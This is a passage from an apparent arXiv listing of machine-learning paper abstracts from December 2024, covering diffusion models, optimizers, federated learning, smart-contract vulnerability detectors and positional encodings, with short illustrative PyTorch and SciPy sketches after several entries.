Generative AI is rapidly reshaping creative work, raising critical questions about its beneficiaries and societal implications. This study challenges prevailing assumptions by exploring how generative AI interacts with diverse forms of human capital in creative tasks. Through two random controlled experiments in flash fiction writing and song composition, we uncover a paradox: while AI democratizes access to creative tools, it simultaneously amplifies cognitive inequalities. Our findings reveal that AI enhances general human capital (cognitive abilities and education) by facilitating adaptability and idea integration but diminishes the value of domain-specific expertise. We introduce a novel theoretical framework that merges human capital theory with the automation-augmentation perspective, offering a nuanced understanding of human-AI collaboration. This framework elucidates how AI shifts the locus of creative advantage from specialized expertise to broader cognitive adaptability. Contrary to the notion of AI as a universal equalizer, our work highlights its potential to exacerbate disparities in skill valuation, reshaping workplace hierarchies and redefining the nature of creativity in the AI era. These insights advance theories of human capital and automation while providing actionable guidance for organizations navigating AI integration amidst workforce inequalities.
Updated: 2024-12-05 08:27:14
Domain: cs.HC,cs.AI,econ.GN,q-fin.EC
Local Curvature Smoothing with Stein's Identity for Efficient Score Matching
The training of score-based diffusion models (SDMs) is based on score matching. The challenge of score matching is that it includes a computationally expensive Jacobian trace. While several methods have been proposed to avoid this computation, each has drawbacks, such as instability during training and approximating the learning as learning a denoising vector field rather than a true score. We propose a novel score matching variant, local curvature smoothing with Stein's identity (LCSS). The LCSS bypasses the Jacobian trace by applying Stein's identity, enabling regularization effectiveness and efficient computation. We show that LCSS surpasses existing methods in sample generation performance and matches the performance of denoising score matching, widely adopted by most SDMs, in evaluations such as FID, Inception score, and bits per dimension. Furthermore, we show that LCSS enables realistic image generation even at a high resolution of $1024 \times 1024$.
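For contrast, the expensive term LCSS is designed to avoid can be written down directly: standard (Hyvärinen) score matching with the Jacobian trace estimated by Hutchinson probes. This sketch shows that baseline objective, not the LCSS regularizer itself.

```python
import torch
import torch.nn as nn

def sm_loss(score_net, x, n_probes=1):
    """Hyvarinen score matching, E[0.5 ||s||^2 + tr(grad s)], with the
    Jacobian trace estimated by Hutchinson (Rademacher) probes. This
    trace is the costly term that LCSS bypasses via Stein's identity."""
    x = x.detach().requires_grad_(True)
    s = score_net(x)
    norm_term = 0.5 * (s ** 2).sum(dim=1)
    trace = torch.zeros(x.shape[0])
    for _ in range(n_probes):
        v = torch.randint(0, 2, x.shape).float() * 2 - 1
        (jv,) = torch.autograd.grad((s * v).sum(), x, create_graph=True)
        trace = trace + (jv * v).sum(dim=1) / n_probes
    return (norm_term + trace).mean()

net = nn.Sequential(nn.Linear(2, 64), nn.SiLU(), nn.Linear(64, 2))
data = torch.randn(256, 2)                 # samples from N(0, I)
opt = torch.optim.Adam(net.parameters(), lr=1e-3)
for _ in range(500):
    opt.zero_grad()
    sm_loss(net, data).backward()
    opt.step()
# The true score of N(0, I) is -x, so net([1, 0]) should be roughly [-1, 0].
print(net(torch.tensor([[1.0, 0.0]])))
```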
Updated: 2024-12-05 08:26:13
Domain: cs.LG,cs.CV
Electronic Health Records-Based Data-Driven Diabetes Knowledge Unveiling and Risk Prognosis
In the healthcare sector, the application of deep learning technologies has revolutionized data analysis and disease forecasting. This is particularly evident in the field of diabetes, where the deep analysis of Electronic Health Records (EHR) has unlocked new opportunities for early detection and effective intervention strategies. Our research presents an innovative model that synergizes the capabilities of Bidirectional Long Short-Term Memory Networks-Conditional Random Field (BiLSTM-CRF) with a fusion of XGBoost and Logistic Regression. This model is designed to enhance the accuracy of diabetes risk prediction by conducting an in-depth analysis of electronic medical records data. The first phase of our approach involves employing BiLSTM-CRF to delve into the temporal characteristics and latent patterns present in EHR data. This method effectively uncovers the progression trends of diabetes, which are often hidden in the complex data structures of medical records. The second phase leverages the combined strength of XGBoost and Logistic Regression to classify these extracted features and evaluate associated risks. This dual approach facilitates a more nuanced and precise prediction of diabetes, outperforming traditional models, particularly in handling multifaceted and nonlinear medical datasets. Our research demonstrates a notable advancement in diabetes prediction over traditional methods, showcasing the effectiveness of our combined BiLSTM-CRF, XGBoost, and Logistic Regression model. This study highlights the value of data-driven strategies in clinical decision-making, equipping healthcare professionals with precise tools for early detection and intervention. By enabling personalized treatment and timely care, our approach signifies progress in incorporating advanced analytics in healthcare, potentially improving outcomes for diabetes and other chronic conditions.
Updated: 2024-12-05 08:26:07
Categories: cs.LG
A Framework For Image Synthesis Using Supervised Contrastive Learning
Text-to-image (T2I) generation aims at producing realistic images corresponding to text descriptions. Generative Adversarial Networks (GANs) have proven successful in this task. Typical T2I GANs are two-phase methods that first pretrain an inter-modal representation from aligned image-text pairs and then train a GAN-based image generator on that basis. However, such representations ignore inner-modal semantic correspondence, e.g., between images with the same label. The semantic label describes a priori the inherent distribution pattern and underlying cross-image relationships, supplementing the text description for understanding the full characteristics of an image. In this paper, we propose a framework leveraging both inter- and inner-modal correspondence via label-guided supervised contrastive learning. We extend T2I GANs with two parameter-sharing contrast branches in both the pretraining and generation phases. This integration effectively clusters semantically similar image-text pair representations, thereby fostering the generation of higher-quality images. We demonstrate our framework on four representative T2I GANs using both the single-object dataset CUB and the multi-object dataset COCO, achieving significant improvements in the Inception Score (IS) and Frechet Inception Distance (FID) metrics of image-generation evaluation. Notably, on the more complex multi-object COCO, our framework improves FID by 30.1%, 27.3%, 16.2% and 17.1% for AttnGAN, DM-GAN, SSA-GAN and GALIP, respectively. We also validate our superiority by comparing with other label-guided T2I GANs. The results affirm the effectiveness and competitiveness of our approach in advancing the state-of-the-art GAN for T2I generation.
Updated: 2024-12-05 08:15:37
Categories: cs.CV,cs.AI
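For reference, the label-guided objective that such contrast branches typically optimize is the supervised contrastive (SupCon) loss; a minimal PyTorch sketch is below, assuming features come from one of the parameter-sharing branches. The paper's exact branch design and temperature are not specified here.

    import torch
    import torch.nn.functional as F

    def supcon_loss(features, labels, temperature=0.1):
        # pulls together embeddings that share a semantic label
        z = F.normalize(features, dim=1)                 # (N, D) unit embeddings
        sim = z @ z.t() / temperature                    # (N, N) similarities
        n = z.shape[0]
        self_mask = torch.eye(n, dtype=torch.bool, device=z.device)
        pos_mask = (labels.unsqueeze(0) == labels.unsqueeze(1)) & ~self_mask
        sim = sim.masked_fill(self_mask, float('-inf'))  # drop self-pairs
        log_prob = sim - torch.logsumexp(sim, dim=1, keepdim=True)
        log_prob = log_prob.masked_fill(self_mask, 0.0)  # avoid 0 * -inf
        pos_count = pos_mask.sum(dim=1).clamp(min=1)
        return -(log_prob * pos_mask).sum(dim=1).div(pos_count).mean()

Images with the same label land in the numerator as positives, which is the clustering effect the abstract describes.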
Adaptive Optimizers with Sparse Group Lasso for Neural Networks in CTR Prediction
We develop a novel framework that adds the regularizers of the sparse group lasso to a family of adaptive optimizers in deep learning, such as Momentum, Adagrad, Adam, AMSGrad and AdaHessian, thereby creating a new class of optimizers, named Group Momentum, Group Adagrad, Group Adam, Group AMSGrad and Group AdaHessian, etc., accordingly. We establish theoretically proven convergence guarantees in the stochastic convex setting, based on primal-dual methods. We evaluate the regularizing effect of our new optimizers on three large-scale real-world ad click datasets with state-of-the-art deep learning models. The experimental results reveal that, compared with the original optimizers combined with a post-processing procedure that uses magnitude pruning, the performance of the models can be significantly improved at the same sparsity level. Furthermore, in comparison to the cases without magnitude pruning, our methods can achieve extremely high sparsity with significantly better or highly competitive performance. The code is available at https://github.com/intelligent-machine-learning/tfplus/tree/main/tfplus.
Updated: 2024-12-05 08:11:50
Categories: cs.LG
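For intuition, the sparse group lasso penalty has the form lam1 * ||w||_1 + lam2 * sum_g ||w_g||_2, and a common way to apply it after an adaptive update is the closed-form proximal operator sketched below in PyTorch. The paper derives its optimizers with primal-dual methods, so treat this prox step (and the equal-size grouping) as an illustrative assumption, not their exact update rule.

    import torch

    def sparse_group_lasso_prox(w, lr, lam1, lam2, group_size):
        # element-wise soft-thresholding (the lasso term)
        w = torch.sign(w) * torch.clamp(w.abs() - lr * lam1, min=0.0)
        # group-wise shrinkage (the group lasso term); w.numel() must be divisible by group_size
        g = w.view(-1, group_size)
        norms = g.norm(dim=1, keepdim=True)
        scale = torch.clamp(1.0 - lr * lam2 / (norms + 1e-12), min=0.0)
        return (g * scale).view_as(w)

Once a group's norm falls below lr * lam2, the whole feature group is zeroed, which is how such optimizers reach high structured sparsity without post-hoc magnitude pruning.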
COOL: Efficient and Reliable Chain-Oriented Objective Logic with Neural Networks Feedback Control for Program Synthesis
Program synthesis methods, whether formal or neural-based, lack fine-grained control and flexible modularity, which limits their adaptation to complex software development. These limitations stem from rigid Domain-Specific Language (DSL) frameworks and incorrect neural network predictions. To this end, we propose the Chain of Logic (CoL), which organizes the synthesis process into an activity flow and provides heuristic control to guide the process. Furthermore, by integrating neural networks with libraries and introducing a Neural Network Feedback Control (NNFC) mechanism, our approach modularizes synthesis and mitigates the impact of neural network mispredictions. Experiments on relational and symbolic synthesis tasks show that CoL significantly enhances the efficiency and reliability of DSL program synthesis across multiple metrics. Specifically, CoL improves accuracy by 70% while reducing tree operations by 91% and time by 95%. Additionally, NNFC further boosts accuracy by 6%, with a 64% reduction in tree operations under challenging conditions such as insufficient training data, increased difficulty, and multidomain synthesis. These improvements confirm COOL, the combination of CoL and NNFC, as a highly efficient and reliable program synthesis framework.
Updated: 2024-12-05 08:10:55
Categories: cs.SE,cs.LG
BEFL: Balancing Energy Consumption in Federated Learning for Mobile Edge IoT
Federated Learning (FL) is a privacy-preserving distributed learning paradigm designed to build a highly accurate global model. In Mobile Edge IoT (MEIoT), the training and communication processes can significantly deplete the limited battery resources of devices. Existing research primarily focuses on reducing overall energy consumption, but this may inadvertently create energy consumption imbalances, leading to the premature dropout of energy-sensitive devices. To address these challenges, we propose BEFL, a joint optimization framework aimed at balancing three objectives: enhancing global model accuracy, minimizing total energy consumption, and reducing energy usage disparities among devices. First, taking into account the communication constraints of MEIoT and the heterogeneity of devices, we employ the Sequential Least Squares Programming (SLSQP) algorithm for the rational allocation of communication resources. Based on this, we introduce a heuristic client selection algorithm that combines cluster partitioning with utility-driven approaches to reduce both the total energy consumption of all devices and the discrepancies in energy usage. Furthermore, we utilize the proposed heuristic client selection algorithm as a template for offline imitation learning during pre-training, while adopting a ranking-based reinforcement learning approach online to further boost training efficiency. Our experiments reveal that BEFL improves global model accuracy by 1.6%, reduces energy consumption variance by 72.7%, and lowers total energy consumption by 28.2% compared to existing methods. The relevant code can be found at https://github.com/juzehao/BEFL.
Updated: 2024-12-05 07:58:32
Categories: cs.LG,cs.DC
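To show the kind of allocation step the abstract refers to, here is a toy SLSQP example with SciPy: minimize a simple transmission-energy model c_i / b_i over per-device bandwidths b_i under a total budget. BEFL's actual objective and constraints are richer; the cost model and numbers below are purely illustrative.

    import numpy as np
    from scipy.optimize import minimize

    c = np.array([2.0, 1.0, 4.0])        # per-device communication cost factors
    B = 10.0                             # total bandwidth budget

    res = minimize(
        fun=lambda b: np.sum(c / b),     # toy total transmission energy
        x0=np.full(len(c), B / len(c)),
        method="SLSQP",
        bounds=[(1e-3, B)] * len(c),
        constraints=[{"type": "ineq", "fun": lambda b: B - b.sum()}],
    )
    print(res.x)  # costlier devices receive proportionally more bandwidth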
Learning Speed-Adaptive Walking Agent Using Imitation Learning with Physics-Informed Simulation
Virtual models of human gait, or digital twins, offer a promising solution for studying mobility without the need for labor-intensive data collection. However, challenges such as the sim-to-real gap and limited adaptability to diverse walking conditions persist. To address these, we developed and validated a framework to create a skeletal humanoid agent capable of adapting to varying walking speeds while maintaining biomechanically realistic motions. The framework combines a synthetic data generator, which produces biomechanically plausible gait kinematics from open-source biomechanics data, and a training system that uses adversarial imitation learning to train the agent's walking policy. We conducted comprehensive analyses comparing the agent's kinematics, synthetic data, and the original biomechanics dataset. The agent achieved a root mean square error of 5.24 ± 0.09 degrees at varying speeds compared to ground-truth kinematics data, demonstrating its adaptability. This work represents a significant step toward developing a digital twin of human locomotion, with potential applications in biomechanics research, exoskeleton design, and rehabilitation.
Updated: 2024-12-05 07:55:58
Categories: cs.RO,cs.LG
WACANA: A Concolic Analyzer for Detecting On-chain Data Vulnerabilities in WASM Smart Contracts
WebAssembly (WASM) has emerged as a crucial technology in smart contract development for several blockchain platforms. Unfortunately, since their introduction, WASM smart contracts have been subject to several security incidents caused by contract vulnerabilities, resulting in substantial economic losses. However, existing tools for detecting WASM contract vulnerabilities have accuracy limitations, one of the main reasons being the coarse-grained emulation of the on-chain data APIs. In this paper, we introduce WACANA, an analyzer for WASM contracts that accurately detects vulnerabilities through fine-grained emulation of on-chain data APIs. WACANA precisely simulates both the structure of on-chain data tables and their corresponding API functions, and integrates concrete and symbolic execution within a coverage-guided loop to balance accuracy and efficiency. Evaluations on a vulnerability dataset of 133 contracts show WACANA outperforming state-of-the-art tools in accuracy. Further validation on 5,602 real-world contracts confirms WACANA's practical effectiveness.
Updated: 2024-12-05 07:51:17
Categories: cs.CR,cs.SE
Chain-of-Thought in Large Language Models: Decoding, Projection, and Activation
Chain-of-Thought prompting has significantly enhanced the reasoning capabilities of large language models, with numerous studies exploring factors influencing its performance. However, the underlying mechanisms remain poorly understood. To further demystify the operational principles, this work examines three key aspects: decoding, projection, and activation, aiming to elucidate the changes that occur within models when employing Chain-of-Thought. Our findings reveal that LLMs effectively imitate exemplar formats while integrating them with their understanding of the question, exhibit fluctuations in token logits during generation but ultimately produce a more concentrated logits distribution, and activate a broader set of neurons in the final layers, indicating more extensive knowledge retrieval compared to standard prompts. Our code and data will be publicly available when the paper is accepted.
Updated: 2024-12-05 07:47:29
Categories: cs.AI
Quality In / Quality Out: Data quality more relevant than model choice in anomaly detection with the UGR'16
Autonomous or self-driving networks are expected to provide a solution to the myriad of extremely demanding new applications with minimal human supervision. For this purpose, the community relies on the development of new Machine Learning (ML) models and techniques. However, ML can only be as good as the data it is fitted with, and data quality is an elusive concept that is difficult to assess. In this paper, we show that relatively minor modifications to a benchmark dataset (UGR'16, a flow-based real-traffic dataset for anomaly detection) have significantly more impact on model performance than the specific ML technique considered. We also show that the measured model performance is uncertain as a result of labelling inaccuracies. Our findings illustrate that the widely adopted approach of comparing a set of models in terms of performance results (e.g., accuracy or ROC curves) may lead to incorrect conclusions when done without a proper understanding of dataset biases and sensitivity. We contribute a methodology for interpreting model responses that can be useful for building this understanding.
Updated: 2024-12-05 07:46:11
Categories: cs.LG
Enhancing and Accelerating Diffusion-Based Inverse Problem Solving through Measurements Optimization
Diffusion models have recently demonstrated notable success in solving inverse problems. However, current diffusion model-based solutions typically require a large number of function evaluations (NFEs) to generate high-quality images conditioned on measurements, as they incorporate only limited information at each step. To accelerate the diffusion-based inverse problem-solving process, we introduce Measurements Optimization (MO), a more efficient plug-and-play module for integrating measurement information at each step of the inverse problem-solving process. This method is comprehensively evaluated across eight diverse linear and nonlinear tasks on the FFHQ and ImageNet datasets. By using MO, we establish state-of-the-art (SOTA) performance across multiple tasks, with key advantages: (1) it operates with no more than 100 NFEs, with phase retrieval on ImageNet being the sole exception; (2) it achieves SOTA or near-SOTA results even at low NFE counts; and (3) it can be seamlessly integrated into existing diffusion model-based solutions for inverse problems, such as DPS (Chung et al., 2022) and Red-diff (Mardani et al., 2023). For example, DPS-MO attains a peak signal-to-noise ratio (PSNR) of 28.71 dB on the FFHQ 256 dataset for high dynamic range imaging, setting a new SOTA benchmark with only 100 NFEs, whereas current methods require between 1000 and 4000 NFEs for comparable performance.
Updated: 2024-12-05 07:44:18
Categories: cs.CV,cs.AI
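For orientation, the baseline mechanism that MO makes more efficient is the per-step measurement-guidance correction used by methods like DPS, sketched below in PyTorch. Here predict_x0 (the denoiser's clean-image estimate) and forward_op (the measurement operator A) are assumed callables, and the MO module itself is not reproduced.

    import torch

    def measurement_guided_step(x_t, y, forward_op, predict_x0, step_size=1.0):
        # nudge x_t down the gradient of the data-fidelity term ||y - A(x0_hat)||^2
        x_t = x_t.detach().requires_grad_(True)
        x0_hat = predict_x0(x_t)                     # posterior-mean estimate of x_0
        residual = ((y - forward_op(x0_hat)) ** 2).sum()
        grad = torch.autograd.grad(residual, x_t)[0]
        return (x_t - step_size * grad).detach()

Because only a weak correction enters each step, many NFEs are normally needed; optimizing how much measurement information is injected per step is what lets MO stay under 100 NFEs.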
Differentially Private Synthetic Data via Foundation Model APIs 1: Images
Generating differentially private (DP) synthetic data that closely resembles the original private data is a scalable way to mitigate privacy concerns in the current data-driven world. In contrast to current practices that train customized models for this task, we aim to generate DP Synthetic Data via APIs (DPSDA), where we treat foundation models as blackboxes and only utilize their inference APIs. Such API-based, training-free approaches are easier to deploy as exemplified by the recent surge in the number of API-based apps. These approaches can also leverage the power of large foundation models which are only accessible via their inference APIs. However, this comes with greater challenges due to strictly more restrictive model access and the need to protect privacy from the API provider. In this paper, we present a new framework called Private Evolution (PE) to solve this problem and show its initial promise on synthetic images. Surprisingly, PE can match or even outperform state-of-the-art (SOTA) methods without any model training. For example, on CIFAR10 (with ImageNet as the public data), we achieve FID <= 7.9 with privacy cost $\epsilon = 0.67$, significantly improving the previous SOTA from $\epsilon = 32$. We further demonstrate the promise of applying PE on large foundation models such as Stable Diffusion to tackle challenging private datasets with a small number of high-resolution images. The code and data are released at https://github.com/microsoft/DPSDA.
Updated: 2024-12-05 07:43:25
Categories: cs.CV,cs.CR,cs.LG
Representation Alignment for Generation: Training Diffusion Transformers Is Easier Than You Think
Recent studies have shown that the denoising process in (generative) diffusion models can induce meaningful (discriminative) representations inside the model, though the quality of these representations still lags behind those learned through recent self-supervised learning methods. We argue that one main bottleneck in training large-scale diffusion models for generation lies in effectively learning these representations. Moreover, training can be made easier by incorporating high-quality external visual representations, rather than relying solely on the diffusion models to learn them independently. We study this by introducing a straightforward regularization called REPresentation Alignment (REPA), which aligns the projections of noisy input hidden states in denoising networks with clean image representations obtained from external, pretrained visual encoders. The results are striking: our simple strategy yields significant improvements in both training efficiency and generation quality when applied to popular diffusion and flow-based transformers, such as DiTs and SiTs. For instance, our method can speed up SiT training by over 17.5$\times$, matching the performance (without classifier-free guidance) of a SiT-XL model trained for 7M steps in less than 400K steps. In terms of final generation quality, our approach achieves state-of-the-art results of FID=1.42 using classifier-free guidance with the guidance interval.
Updated: 2024-12-05 07:39:22
Categories: cs.CV,cs.LG
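The regularizer itself is compact. Below is a PyTorch sketch of one plausible form: project the denoising network's hidden states of the noisy input and align them, patch-wise, with clean-image features from a frozen pretrained encoder. The projector head and the negative-cosine similarity are assumptions consistent with the abstract, not a verbatim reproduction of REPA.

    import torch
    import torch.nn.functional as F

    def repa_loss(diffusion_hidden, encoder_feats, projector):
        h = projector(diffusion_hidden)                  # (B, N, D_enc) projection
        h = F.normalize(h, dim=-1)
        z = F.normalize(encoder_feats.detach(), dim=-1)  # frozen target features
        return -(h * z).sum(dim=-1).mean()               # maximize cosine similarity

The total objective is then the usual diffusion loss plus a weighted repa_loss term, so the generator no longer has to discover good representations entirely on its own.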
JANUS: A Difference-Oriented Analyzer For Financial Centralization Risks in Smart Contracts
Some smart contracts violate decentralization principles by defining privileged accounts that manage other users' assets without permission, introducing centralization risks that have caused financial losses. Existing methods, however, face challenges in accurately detecting diverse centralization risks due to their dependence on predefined behavior patterns. In this paper, we propose JANUS, an automated analyzer for Solidity smart contracts that detects financial centralization risks independently of their specific behaviors. JANUS identifies differences between states reached by privileged and ordinary accounts, and analyzes whether these differences are finance-related. Focusing on the impact of risks rather than behaviors, JANUS achieves improved accuracy compared to existing tools and can uncover centralization risks with unknown patterns. To evaluate JANUS's performance, we compare it with other tools using a dataset of 540 contracts. Our evaluation demonstrates that JANUS outperforms representative tools in terms of detection accuracy for financial centralization risks. Additionally, we evaluate JANUS on a real-world dataset of 33,151 contracts, successfully identifying two types of risks that other tools fail to detect. We also prove that the state traversal method and variable summaries, which are used in JANUS to reduce the number of states to be compared, do not introduce false alarms or omissions in detection.
Updated: 2024-12-05 07:35:56
Categories: cs.LG,cs.CR
Deep Learning Modeling Method for RF Devices Based on Uniform Noise Training Set
As the scale and complexity of integrated circuits continue to increase, traditional modeling methods are struggling to address the nonlinear challenges in radio frequency (RF) chips. Deep learning has been increasingly applied to RF device modeling. This paper proposes a deep learning-based modeling method for RF devices using a uniform noise training set, aimed at modeling and fitting the nonlinear characteristics of RF devices. We hypothesize that a uniform noise signal can encompass the full range of characteristics across both frequency and amplitude, and that a deep learning model can effectively capture and learn these features. Based on this hypothesis, the paper designs a complete integrated circuit modeling process based on measured data, including data collection, processing, and neural network training. The proposed method is experimentally validated using the RF amplifier PW210 as a case study. Experimental results show that the uniform noise training set allows the model to capture the nonlinear characteristics of RF devices, and the trained model can predict waveform patterns it has never encountered before. The proposed deep learning-based RF device modeling method, using a uniform noise training set, demonstrates strong generalization capability and excellent training performance, offering high practical application value.
Updated: 2024-12-05 07:34:04
Categories: eess.SP,cs.LG
InfiniCube: Unbounded and Controllable Dynamic 3D Driving Scene Generation with World-Guided Video Models
We present InfiniCube, a scalable method for generating unbounded dynamic 3D driving scenes with high fidelity and controllability. Previous methods for scene generation either suffer from limited scales or lack geometric and appearance consistency along generated sequences. In contrast, we leverage the recent advancements in scalable 3D representation and video models to achieve large dynamic scene generation that allows flexible controls through HD maps, vehicle bounding boxes, and text descriptions. First, we construct a map-conditioned sparse-voxel-based 3D generative model to unleash its power for unbounded voxel world generation. Then, we re-purpose a video model and ground it on the voxel world through a set of carefully designed pixel-aligned guidance buffers, synthesizing a consistent appearance. Finally, we propose a fast feed-forward approach that employs both voxel and pixel branches to lift the dynamic videos to dynamic 3D Gaussians with controllable objects. Our method can generate controllable and realistic 3D driving scenes, and extensive experiments validate the effectiveness and superiority of our model.
Updated: 2024-12-05 07:32:20
Categories: cs.CV,cs.AI,cs.GR
Sharpness-Aware Minimization Revisited: Weighted Sharpness as a Regularization Term
Deep Neural Networks (DNNs) generalization is known to be closely related to the flatness of minima, leading to the development of Sharpness-Aware Minimization (SAM) for seeking flatter minima and better generalization. In this paper, we revisit the loss of SAM and propose a more general method, called WSAM, by incorporating sharpness as a regularization term. We prove its generalization bound through the combination of PAC and Bayes-PAC techniques, and evaluate its performance on various public datasets. The results demonstrate that WSAM achieves improved generalization, or is at least highly competitive, compared to the vanilla optimizer, SAM and its variants. The code is available at https://github.com/intelligent-machine-learning/atorch/tree/main/atorch/optimizers.
Updated: 2024-12-05 07:31:10
Categories: cs.LG
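One published reading of the weighted objective is L(w) + (gamma / (1 - gamma)) * (L(w + e) - L(w)), with e the SAM ascent direction; gamma = 0.5 recovers SAM and smaller gamma down-weights sharpness. The PyTorch sketch below implements that reading; treat the exact mixing rule as an assumption rather than the paper's verbatim update.

    import torch

    def wsam_step(model, loss_fn, x, y, opt, rho=0.05, gamma=0.4):
        loss_fn(model(x), y).backward()
        base_grads = [p.grad.detach().clone() for p in model.parameters()]
        norm = torch.sqrt(sum((g ** 2).sum() for g in base_grads))
        eps = [rho * g / (norm + 1e-12) for g in base_grads]
        with torch.no_grad():                       # ascend to the worst-case neighbour
            for p, e in zip(model.parameters(), eps):
                p.add_(e)
        model.zero_grad()
        loss_fn(model(x), y).backward()             # gradient at the perturbed point
        alpha = gamma / (1.0 - gamma)               # sharpness weight
        with torch.no_grad():
            for p, e, g in zip(model.parameters(), eps, base_grads):
                p.sub_(e)                           # restore the original weights
                p.grad = (1.0 - alpha) * g + alpha * p.grad
        opt.step()
        model.zero_grad()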
Context Matters: Leveraging Contextual Features for Time Series Forecasting
Time series forecasts are often influenced by exogenous contextual features in addition to their corresponding history. For example, in financial settings, it is hard to accurately predict a stock price without considering public sentiments and policy decisions in the form of news articles, tweets, etc. Though this is common knowledge, the current state-of-the-art (SOTA) forecasting models fail to incorporate such contextual information, owing to its heterogeneity and multimodal nature. To address this, we introduce ContextFormer, a novel plug-and-play method to surgically integrate multimodal contextual information into existing pre-trained forecasting models. ContextFormer effectively distills forecast-specific information from rich multimodal contexts, including categorical, continuous, time-varying, and even textual information, to significantly enhance the performance of existing base forecasters. ContextFormer outperforms SOTA forecasting models by up to 30% on a range of real-world datasets spanning energy, traffic, environmental, and financial domains.
Updated: 2024-12-05 07:27:31
Categories: cs.LG,cs.AI
Exploring AI Text Generation, Retrieval-Augmented Generation, and Detection Technologies: a Comprehensive Overview
The rapid development of Artificial Intelligence (AI) has led to the creation of powerful text generation models, such as large language models (LLMs), which are widely used for diverse applications. However, concerns surrounding AI-generated content, including issues of originality, bias, misinformation, and accountability, have become increasingly prominent. This paper offers a comprehensive overview of AI text generators (AITGs), focusing on their evolution, capabilities, and ethical implications. This paper also introduces Retrieval-Augmented Generation (RAG), a recent approach that improves the contextual relevance and accuracy of text generation by integrating dynamic information retrieval. RAG addresses key limitations of traditional models, including their reliance on static knowledge and potential inaccuracies in handling real-world data. Additionally, the paper reviews detection tools that help differentiate AI-generated text from human-written content and discusses the ethical challenges these technologies pose. The paper explores future directions for improving detection accuracy, supporting ethical AI development, and increasing accessibility. The paper contributes to a more responsible and reliable use of AI in content creation through these discussions.
Updated: 2024-12-05 07:23:14
Categories: cs.AI,cs.HC,cs.LG
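Since the paper surveys RAG at a conceptual level, a minimal sketch of the loop may help; every name below (embed, index.search, generate) is a hypothetical stand-in for an embedding model, a vector index, and an LLM, and no specific library API is implied.

    def rag_answer(query, docs, embed, index, generate, k=3):
        q_vec = embed(query)
        top_ids = index.search(q_vec, k)             # dynamic information retrieval
        context = "\n\n".join(docs[i] for i in top_ids)
        prompt = ("Answer using only the context below.\n\n"
                  f"Context:\n{context}\n\nQuestion: {query}")
        return generate(prompt)                      # grounded, context-aware output

Grounding generation in retrieved documents is what addresses the static-knowledge limitation the survey highlights.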
Developing a Thailand solar irradiance map using Himawari-8 satellite imageries and deep learning models
This paper presents an online platform showing a Thailand solar irradiance map every 30 minutes, available at https://www.cusolarforecast.com. The methodology for estimating global horizontal irradiance (GHI) across Thailand relies on a cloud index extracted from Himawari-8 satellite imagery, the Ineichen clear-sky model with locally tuned Linke turbidity, and machine learning models. The methods take clear-sky irradiance, cloud index, re-analyzed GHI and temperature data from the MERRA-2 database, and date-time as inputs for GHI estimation models, including LightGBM, LSTM, Informer, and Transformer. These are benchmarked against the estimate from a commercial service X by evaluating 15-minute ground GHI data from 53 ground stations over 1.5 years during 2022-2023. The results show that the four models exhibit overall MAE performance comparable to service X. The best model is LightGBM, with an overall MAE of 78.58 W/sqm and RMSE of 118.97 W/sqm, while service X achieves the lowest MAE, RMSE, and MBE in cloudy conditions. Obtaining re-analyzed MERRA-2 data for the whole Thailand region is not economically feasible for deployment. When these features are removed, the Informer model has the winning MAE of 78.67 W/sqm. The obtained performance is consistent with the existing literature once the climate zone and the time granularity of the data are taken into consideration. As the map provides a GHI estimate over 93,000 grid cells with frequent updates, the paper also describes a computational framework for displaying the entire map and tests the runtime performance of the deep learning models in the GHI estimation process.
Updated: 2024-12-05 07:14:52
Categories: physics.ao-ph,cs.AI,cs.CV,cs.LG
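For readers new to cloud-index methods, the first-order relation that the ML models refine is the classical heuristic below; the linear form and the sample numbers are illustrative only, not the platform's fitted model.

    def ghi_estimate(ghi_clearsky, cloud_index):
        # GHI ~ (1 - CI) * GHI_clearsky: clear-sky output at CI = 0,
        # approaching zero as the satellite-derived cloud index saturates
        return max(0.0, 1.0 - cloud_index) * ghi_clearsky

    print(ghi_estimate(850.0, 0.35))  # -> 552.5 W/sqm under partial cloud

The learned models (LightGBM, LSTM, Informer, Transformer) effectively replace this linear map with a nonlinear one that also ingests MERRA-2 re-analysis features and date-time.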
MIND: Effective Incorrect Assignment Detection through a Multi-Modal Structure-Enhanced Language Model
The rapid growth of academic publications has exacerbated the issue of author name ambiguity in online digital libraries. Despite advances in name disambiguation algorithms, cumulative errors continue to undermine the reliability of academic systems. It is estimated that over 10% of paper-author assignments are rectified when constructing the million-scale WhoIsWho benchmark. Existing endeavors to detect incorrect assignments are either semantic-based or graph-based approaches, which fall short of making full use of the rich text attributes of papers and the implicit structural features defined via the co-occurrence of paper attributes. To this end, this paper introduces a structure-enhanced language model that combines key structural features from graph-based methods with fine-grained semantic features from rich paper attributes to detect incorrect assignments. The proposed model is trained with a highly effective multi-modal multi-turn instruction tuning framework, which incorporates task-guided instruction tuning, text-attribute modality, and structural modality. Experimental results demonstrate that our model outperforms previous approaches, achieving top performance on the leaderboard of KDD Cup 2024. Our code has been made publicly available.
Updated: 2024-12-05 07:12:53
Categories: cs.CL,cs.AI
HoPE: A Novel Positional Encoding Without Long-Term Decay for Enhanced Context Awareness and Extrapolation
Many positional encodings (PEs) are designed to exhibit long-term decay, based on an entrenched and long-standing inductive opinion: tokens farther away from the current position carry less relevant information. We argue that long-term decay is outdated in the era of LLMs, as LLMs are now applied to tasks demanding precise retrieval of in-context information from arbitrary positions. Firstly, we present empirical analyses on various PEs, demonstrating that models inherently learn attention with only a local-decay pattern while forming a U-shape pattern globally, contradicting the principle of long-term decay. Furthermore, we conduct a detailed analysis of rotary position encoding (RoPE, a prevalent relative positional encoding in LLMs), and find that the U-shape attention is caused by some learned components, which are also the key factor limiting RoPE's expressiveness and extrapolation. Inspired by these insights, we propose High-frequency rotary Position Encoding (HoPE). HoPE replaces the specific components in RoPE with position-independent ones, retaining only high-frequency signals, which also breaks the principle of long-term decay in theory. HoPE achieves two major advantages: (1) without the constraints imposed by long-term decay, the contradictory factors that limit spontaneous attention optimization and model extrapolation performance are removed; (2) the components representing positions and semantics are optimized. These changes enhance the model's context awareness and extrapolation, as validated by extensive experiments.
Updated: 2024-12-05 07:09:27
Categories: cs.CL,cs.AI,cs.LG
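To ground the frequency terminology: standard RoPE gives the i-th rotary pair the frequency base^(-2i/d), so early pairs rotate quickly (high-frequency, position-sensitive) and later pairs slowly (the components associated with long-term decay). The sketch below keeps only the high-frequency pairs; HoPE's position-independent replacements for the remaining components are not modeled, and keep_ratio is an illustrative knob.

    import torch

    def high_freq_rope_angles(seq_len, dim, base=10000.0, keep_ratio=0.5):
        inv_freq = base ** (-torch.arange(0, dim, 2).float() / dim)  # high -> low
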